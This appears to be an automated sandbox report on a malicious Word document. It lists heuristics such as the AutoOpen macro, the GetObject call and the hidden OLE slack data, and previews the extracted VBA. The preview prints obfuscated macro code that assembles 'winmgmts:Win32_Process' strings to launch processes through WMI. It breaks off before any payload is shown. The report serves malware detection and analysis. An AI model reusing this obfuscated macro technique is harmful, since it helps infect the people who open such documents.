MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document with a high heuristic score for OLE slack anomalies and the presence of VBA macros. The AutoOpen macro and GetObject call indicate malicious intent. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but it is highly likely to download and execute a second-stage payload. The document body is unreadable binary data, providing no contextual clues.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 198,933 bytes but its declared streams total only 86,618 bytes — 112,315 bytes (56%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53377 bytes |
SHA-256: 39b9db656f585d0f6e73e122a2ce2ed8492e5a9b879b70866a650d2d3a0c76e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "W03649"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S00531__"
Function V003___()
Select Case W71__0
Case 403329919
Set j1635_1_ = n7667_
V981745_ = (R2180_7 * Fix(221096868 / CBool(B99_2_))) - D18_4__1 / Oct(324891223) / 655895788 + CStr(v9868_) - 106392305 + ChrB(Y_4_5___)
Set h060218_ = h9_9_56
End Select
Select Case R38_167
Case 919499308
Set N_5_541_ = w_8017_
s703806_ = (k387_8 * Fix(704734942 / CBool(Z662_5))) - h__974_ / Oct(154980682) / 345639957 + CStr(n2_78_34) - 367700787 + ChrB(E500_97)
Set r14___64 = O8__129
End Select
Select Case J_010_
Case 611073831
Set K64_11 = v70533
q226223 = (Z194622 * Fix(689601851 / CBool(A53_860))) - G_1_68 / Oct(871099858) / 767659880 + CStr(u13488_) - 540957513 + ChrB(R895_54)
Set b1791_ = P407592
End Select
Select Case j7_0975
Case 935710513
Set z_9_589 = t150__
P53__4 = (t8_996_0 * Fix(344385580 / CBool(i47_842))) - Q_2_851 / Oct(585616498) / 371637813 + CStr(b5_7__) - 495982459 + ChrB(D96277_)
Set h096_82 = F4665_7_
End Select
Select Case t059655_
Case 387890685
Set p_1640 = E490_65
O_70_493 = (a_077_3 * Fix(772027418 / CBool(r2_26084))) - L1_780 / Oct(437008989) / 617568502 + CStr(T4_57_6_) - 149238781 + ChrB(h4_13_64)
Set S3237_3_ = i_6695
End Select
Select Case F__760_9
Case 10472895
Set M031__2 = t6565_
E_2_2_9 = (i3__6__ * Fix(376333391 / CBool(d688917))) - j6279672 / Oct(452916432) / 866412782 + CStr(d155_958) - 643856433 + ChrB(P68285)
Set f__62905 = h88_9153
End Select
End Function
Function i_869024(w__382, J7156_2)
On Error Resume Next
Select Case T5420_
Case 44125887
Set G0842_7_ = u884118
a_43356 = (F_0380 * Fix(823499921 / CBool(i2_810))) - W_1313_ / Oct(655267860) / 687012151 + CStr(b5_097__) - 956213578 + ChrB(r76__0)
Set s82__95_ = l7_9_2__
End Select
Select Case d6__63_2
Case 583333181
Set E6_806 = i97_8__
v715__45 = (r5_873 * Fix(275827680 / CBool(K__6_4))) - E85192 / Oct(992204911) / 221834429 + CStr(s3004_37) - 204214098 + ChrB(A0489_)
Set G31483_7 = I_5666
End Select
S_1__95 = i1371_2 + "winm" + "gmts:Win32" + D7_414_9 + "_ProcessStartup" + F7771412
Select Case D0605707
Case 890763360
Set m474_0 = G8464_
f7567469 = (H34191 * Fix(693978343 / CBool(o____06_))) - O3_1_2_8 / Oct(612441167) / 736864485 + CStr(s__82_2_) - 262658177 + ChrB(H8_9070)
Set N_1_63 = i72_5_22
End Select
Select Case a42_6_
Case 589276965
Set a8475982 = m60_37
i2588257 = (z_774003 * Fix(129569388 / CBool(r4453_))) - W_69__38 / Oct(966036698) / 30912404 + CStr(r2_209) - 282560103 + ChrB(E_55__)
Set J55901 = R7712_2
End Select
Select Case K832_42
Case 377019018
Set w910538 = w_6__0
h7_2_6_4 = (C_00_4 * Fix(321035134 / CBool(i04__927))) - h56487__ / Oct(444476268) / 87095537 + CStr(U537854) - 875676868 + ChrB(D_21681)
Set v_760002 = Q___45
End Select
t965769_ = c_28989 + "winm" + "gmts:Win32" + Y52_04 + "_Process" + q13_63
Select Case m684_17
Case 337052983
Set b791__8 = S14_3_4
M194831 = (k__6_325 * Fix(892570338 / CBool(Z_3822))) - j559322 / Oct(592237208) / 796550443 + CStr(V152__7_) - 252186410 + ChrB(u128_4_)
Set Z08_86 = N0951104
End Select
Select Case l4___6_1
Case 732360738
Set D69654 = T69851
i801778_ = (c910127 * Fix(840157709 / CBool(W796298))) - n9_201 / Oct(508443468) / 71530223 + CStr(i_94_02_) - 725619320 + ChrB(B87253_)
Set r_3_6_07 = a1_11__
End Select
Set W_8_52_ = GetObject(z9__8_2 + S_1__95 + T_8_8_)
Select Case z1270743
Case 269622591
Set j7603_ = j_6866_7
U466_0_9 = (u43422 * Fix(830687889 / CBool(A__102))) - b_1__85 / Oct(867945863) / 796508604 + CStr(i0_976) - 952874986 + ChrB(I658870_)
Set k5_33_ = v0_654
End Select
Select Case P9439_
Case 793654361
Set
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.